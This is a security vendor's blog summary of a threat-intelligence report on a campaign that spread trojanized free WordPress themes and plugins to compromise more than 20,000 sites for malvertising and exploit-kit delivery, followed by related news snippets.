How PHP’s Labyrinth Weaponized WordPress Themes for Profit

Prevailion Tailored Intelligence image

New findings from Prevailion’s Tailored Intelligence team indicate the rapid expansion of a series of supply chain attacks that transform installations of the popular WordPress content management system into hosts for a malicious advertising network. More than 20,000 web servers have been identified to be compromised in this campaign.

WordPress has grown to become the backbone of 60% of content management systems, comprising 34% of all websites on the internet. This widespread user base and the ease in which a website can be personalized without knowledge of coding has created a fertile ground for exploitation by threat actors that we have dubbed PHP’s Labyrinth.

As previously reported, a threat actor campaign has been vehicularizing WordPress’ customization tools by enticing victims with trojans disguised as free themes and plugins. Once these are installed, not only can threat actors compromise admin accounts, they can also prop up malavertising ads and use this vector to deliver exploit kits both would allow threat actors to compromise visitors of those websites. 

Prevailion has been working closely with a US federal law enforcement agency to provide new evidence on the threat actor behind this sophisticated botnet, along with the discovery of previously unreported malicious activities, including: 

  • 30 active malicious platforms serving  these malicious themes and plugins 
  • Newly discovered second-stage malware functions such as an anti-adblocker script and additional C2
  • Distribution of the Fallout exploit kit and malvertising adware through the Propeller Ads network (which claims to have over 100 million desktop and mobile users per day)

To learn more, read the full report on the Tailored Intelligence blog.

The Latest

U.S. Hackers have likely “gone to ground”

Karim Hijazi, who served as the director of intelligence of the cybersecurity firm Mandiant and now serves as CEO of the security firm Prevailion, said the hackers will likely have “gone to ground” at this point.

Who’s Impacted by TA505 and Why It Matters

While threat actors like Cozy Bear and Fancy Bear get a lot of attention, there is another While threat actors like Cozy Bear and Fancy Bear get a lot of attention, there is another sophisticated crime actor that companies need to be watching out for.The group is called TA505 and it is believed to be […]

‘Most pristine espionage effort’ in modern history right under the US’s nose

“This was the most pristine espionage effort, unlike anything we’ve seen in a very long time,” said Karim Hijazi, a former intelligence community contractor. “Everyone in the cybersecurity community is freaking out, because we don’t know where this could stop.”

Copyright 2021 Prevailion, Inc. All rights reserved

Disclaimer: Gartner “Cool Vendors in Security Operations and Threat Intelligence,” Mitchell Schneider, Ruggero Contu, John Watts, Craig Lawson, October 13, 2020. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner Disclaimer: The GARTNER COOL VENDOR badge is a trademark and service mark of Gartner, Inc. and/or its affiliates and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.